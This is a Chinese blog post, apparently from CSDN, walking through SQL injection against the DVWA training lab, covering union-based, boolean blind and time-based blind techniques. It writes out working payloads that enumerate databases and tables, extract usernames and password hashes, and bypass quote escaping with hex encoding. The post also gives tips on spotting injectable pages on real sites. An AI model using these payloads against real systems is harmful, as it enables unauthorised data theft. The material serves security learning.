SQL注入攻击实例-DVWA靶场

已于 2024-01-11 00:56:11 修改
阅读量1.8k 收藏 44
点赞数 27
分类专栏: # SQL注入 文章标签: sql 数据库 安全
于 2024-01-10 23:54:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62715196/article/details/135515758
版权

文章目录

DVWA

普通注入

低级别

1.判断是否存在漏洞
'

在这里插入图片描述

2.判断是数字型还是字符型
1 and 1=1

在这里插入图片描述

1 and 1=2

在这里插入图片描述
两种方式均能返回值,说明是字符型而不是数字型

3.猜当前页面字段总数
1' order by 2 #
#:起到将后面字符全部注释的作用

在这里插入图片描述

返回正常界面
1' order by 3 #

LOW-5

报错

=>字段数为2

4.猜解页面中显示的字段编号
1' and 1=2 union select 1,2#
5.猜解当前网站数据库名称
1' and 1=2 union select 1,database()#

在这里插入图片描述

6.猜解当前数据库中所有的表
1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

在这里插入图片描述

7.猜解指定表中所有字段名称
1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述

8.猜解user和password表的具体内容
1' and 1=2 union select user,password from users#

在这里插入图片描述

9.对猜解出的MD5内容进行处理

中级别

URL无显示及无get传参且没有输入框,无法通过输入框进行注入
在这里插入图片描述
采用burp suite抓包即可
在这里插入图片描述

1.判断是否存在注入
'

在这里插入图片描述

2.确定注入点类型
1 and 1=1

在这里插入图片描述

1 and 1=2

在这里插入图片描述
当前存在注入点类型为数字型

3.猜解当前页面字段总数
1 order by 2

在这里插入图片描述

1 order by 3

在这里插入图片描述
判断出当前页面字段总数为2

4.猜解页面中显示的字段编号
1 and 1=2 union select 1,2

中-7

5.猜解当前网站数据库名称
1 and 1=2 union select 1,database()

在这里插入图片描述

6.猜解当前数据库所有表的名称
1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

在这里插入图片描述

7.猜解指定表中的字段名称
1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name= 'users'

在这里插入图片描述
会报错:安全配置对单引号进行了转义
解决方法:通过16进制编码绕过
网站:http://kw360.net/ox2str/
在这里插入图片描述

1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name= 0x7573657273

在数字前加上0x,电脑会自动识别其为16进制并将其转换成users
在这里插入图片描述

8.猜解user和password表中具体内容
1 and 1=2 union select user,password from users

在这里插入图片描述

高级别

安全配置防止工具自动化注入,手工注入没有影响

盲注

低级别(布尔型盲注)

1.寻找可能存在 SQL注入点的页面
GET方式

通过把参数附加在URL中进行提交
寻找如下形式的网页链接

http://www.xxx.com/**asp?id=xx
http://www.xxx.com/**.php?id=xx
http://wwwxxx.com/**aspx?id=xx
http://www.xxx.com/**.jsp?id=xx

测试
在URL后加入单引号查看是否存在注入漏洞
报错则说明存在注入漏洞

POST方式

通过把参数封装在数据包内容中进行提交
寻找存在表单元素的页面

文本框
单选按钮
复选框
文件浏览框
提交按钮
测试

在文本框输入的内容后加入单引号查看是否存在注入漏洞
报错则说明存在注入漏洞

2.确认注入点类型
数字型
在URL后加入 and1=1 能正常返回数据
在URL后加入and1=2  查询不到数据
字符型
在URL后加入'and 1=1#  能正常返回数据
在URL后加入'and 1=2#  查询不到数据

1 and 1=1

在这里插入图片描述

1 and 1=2

在这里插入图片描述
判断其为字符型而不是数字型

如果不敢肯定也可以通过字符型判断语句来确定
1' and 1=1#   
1' and 1=2#
3.猜解当前数据库名字的长度
在URL后加上1’and length (database())>4#
在URL后加上1’and length (database())=4#
在URL后加上1’and length (database())<4#

逐步增大猜测的数字,当返回结果是 exists 时说明猜测正确
在这里插入图片描述
通过上述可知,数据名称长度为4

4.猜解数据库名字的第一个字符
在URL后加上1' and ascii(substr(database(),1,1))>96#
在URL后加上1' and ascii(substr(database(),1,1))<123#

如果返回结果是 exists,说明第一个字符是小写字母
逐渐增加96这个数字或者逐渐减小123,直至查询不出数据,说明猜对

5.按照上一步的方法,逐个猜解出数据库名的每个字符
6.猜解当前数据库中一共有多少张表
在URL后面加1' and (select count(table_name) from information_schema.tables where table_schema=database())=3#
...(同上)

在这里插入图片描述

在URL后面加1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#

在这里插入图片描述
逐渐增大数字,直到返回exists,说明表的总数猜对

7.猜解第一张表的表名长度
在URL后加上1' and length((select table_name from information_schema.tables where table_schema=
database()limit 0,1))=9#

逐渐增大数字,直到返回exists,说明表名的长度猜对
在这里插入图片描述

8.猜解第一张表名的第一个字符
在URL后加上1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>96#

在这里插入图片描述

9.按照上一步的方法,逐个猜解出第一张表的完整表名
10.按照7,8,9的步骤,猜解第二张表的表名

####11.猜解目标表的总字段数

在URL后上1' and (select count(column_name) from information_schema.columns where table_name='users' )=8#

在这里插入图片描述

12.按照猜解表名的方式,依次猜解目标表的字段名
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1)1,1))>96#
13.按照同样的方式,依次猜解目标表的字段内容

中级别(时间型盲注)

用bp抓包,相同的流程走一遍,特殊字符进行转义处理

1' and sleep(5)#或1 and sleep(5)
1' and if(length(database()))=4,sleep(5),1)#
1' and if(ascii(substr(database(),1,1))>96,sleep(5),1)#
1'and if(ascii(substr(database(),1,1))<123,sleep(5),1)#

注入原理和布尔盲注一样,唯一的区别是布尔型盲注可以通过不同回显来猜解信息,而时间型盲注只能通过基于时间延迟来进行猜解

摆烂鱼
关注
  • 27
    点赞
  • 44
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入攻击实战演示(附源码)
hack0919的博客
03-31 4327
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。
SQL注入各种注入原理|绕过技巧|带实例详解|
BING
03-19 7811
Union(联合)注入攻击详解、 字符型union注入、Boolean(布尔盲注)注入攻击详解、报错注入攻击详解(报错注入只显示一条结果,通常要使用limit)、时间注入攻击、堆叠查询注入攻击、二次注入攻击、宽字节注入攻击、cookie注入攻击、base64注入攻击、XFF注入攻击SQL注入绕过技术、sql注入修复建议
网络安全-靶机dvwasql注入Low到High详解(含代码分析)_dvwa sql注入低中高代码分析(1)
2401_84264583的博客
05-09 366
这样的话估计不能使用Error注入。结论:字段为2。
网络安全威胁——SQL注入攻击
聚集机器学习、信息安全
04-04 9218
随着互联网的发展和普及,网络安全问题越来越突出。SQL注入SQL Injection)攻击是其中最普遍的安全隐患之一,它利用应用程序对用户输入数据的信任,将恶意SQL代码注入到应用程序中,导致敏感信息泄露、数据损坏或删除及系统瘫痪,给企业和个人带来巨大损失。
一文带你学习SQL注入
大河之犬的博客
12-21 5633
但需要注意的是,存储过程中也可能会存在注入问题,因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免,则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。下面是一个在Java中调用存储过程的例子,其中。
【web应用安全攻防技术】02 SQL注入 & XSS注入
m0_57432233的博客
01-31 1875
SQL注入攻击是利用Web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术跨站脚本是一种通常存在于Web应用程序中的安全漏洞,使得攻击者可以将恶意的代码注入到网页中,从而危害其他Web访问者(敏感信息、客户端渗透攻击等)客户端脚本:Javascript,Flash ActionScript等。
SQL注入漏洞原理及注入示例
m0_62480631的博客
03-10 1994
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询等操作。用户可以修改参数或数据,传递给服务端,导致服务端拼接了伪造的SQL查询语句,并将伪造的SQL语句发送给数据库服务端执行,数据库SQL语句的执行结果,返回给服务端,服务端又将结果返回给客户端,从而获取到敏感信息,甚至危险的代码或系统指令。
SQL 注入攻击介绍与测试案例
你若盛开,蜜蜂自来
01-25 8524
博主声明: 转载请在开头附加本文链接及作者信息,并标记为转载。本文由博主威威喵原创,请多支持与指教。 本文首发于此 博主:威威喵|博客主页:https://blog.csdn.net/smile_running SQL注入攻击 SQL 注入是利用某些系统没有对用户输入的数据进行充分的检查,而在用户输入数据中注入非法的 SQL 语句段或命令,从而利用系统的 ...
58-58.渗透测试-DVWA靶场案例演示.mp4
最新发布
05-10
58-58.渗透测试-DVWA靶场案例演示.mp4
xss-dvwa靶场详情
04-06
dvwa靶场中的xss漏洞详情
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
java实战:防止SQL注入常用方法及代码示例
oandy0的博客
02-15 1612
本文将介绍几种在Java中防止SQL注入的常用方法,并提供详细的代码示例。我们将探讨使用预编译的SQL语句(Prepared Statements)、使用ORM框架、使用SQL模板引擎和参数化查询等方法。通过本文,可以了解到如何在Java应用程序中实施有效的安全措施,以防范SQL注入攻击
实例讲解 SQL 注入攻击
姚老板的黑店
01-14 1654
本文由 伯乐在线 - zer0Black 翻译,蒋生武 校稿。未经许可,禁止转载! 英文出处:Steve Friedl。欢迎加入翻译小组。 一位客户让我们针对只有他们企业员工和顾客能使用的企业内网进行渗透测试。这是安全评估的一个部分,所以尽管我们之前没有使用过SQL注入来渗透网络,但对其概念也相当熟悉了。最后我们在这项任务中大获成功,现在来回顾一下这个过程的每一步,将它记录为一个案例。
SQL 注入式攻击示例、原理、防范
HappyJandun's 学习笔录
09-13 1287
一、示例(现在不能测试,网站链接出问题了,但是可以看下怎么回事)        大家可以先在Google上搜一下“starFire英语 下载中心”(恕我不能公布网址,要不被人家看见就不愉快了),点击进去,在上面的导航连接中找到“starFire软件”,点进去(应该到'/soft/xhsoft/index.html'路径下了)。随便点一个资源,就会进入下载页面。那我们就来看看,它能不能经受住我
dvwa sql注入攻击流程
08-18
DVWA(Damn Vulnerable Web Application)是一个用于学习和实践网络应用安全的漏洞环境。下面是一个简单的DVWA中的SQL注入攻击流程: 1. 打开DVWA:在浏览器中输入DVWA的地址,并登录到应用程序。 2. 设置安全级别:在DVWA中,有不同的安全级别可供选择。初始安全级别设置为低,你可以通过点击页面上的"DVWA Security"来更改安全级别。 3. 选择目标:在DVWA的主页中,选择"SQL Injection"选项。 4. 探测注入点:在输入框中输入一个单引号('),并观察页面的响应。如果页面显示了SQL错误信息,那么该输入点很可能是一个注入点。 5. 获取数据库版本:使用注入点来获取数据库的版本信息。尝试使用不同的SQL语句,如"1' OR 1=1--"或"1' UNION SELECT @@version--"来获取版本信息。 6. 获取数据库表名:通过使用UNION SELECT语句和ORDER BY子句来获取数据库中的表名。例如,使用语句"1' UNION SELECT table_name FROM information_schema.tables--"来获取表名。 7. 获取表数据:通过使用SELECT语句和FROM子句来获取特定表的数据。使用语句"1' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'table_name'--"来获取表的列名。然后,使用语句"1' UNION SELECT column1, column2 FROM table_name--"来获取表的具体数据。 请注意,这只是一个简单的DVWASQL注入攻击的流程示例。在实际情况中,攻击者可能需要进行更多的尝试和调整来成功地执行SQL注入攻击。同时,强烈建议仅在合法授权和控制下使用这些技术,以遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值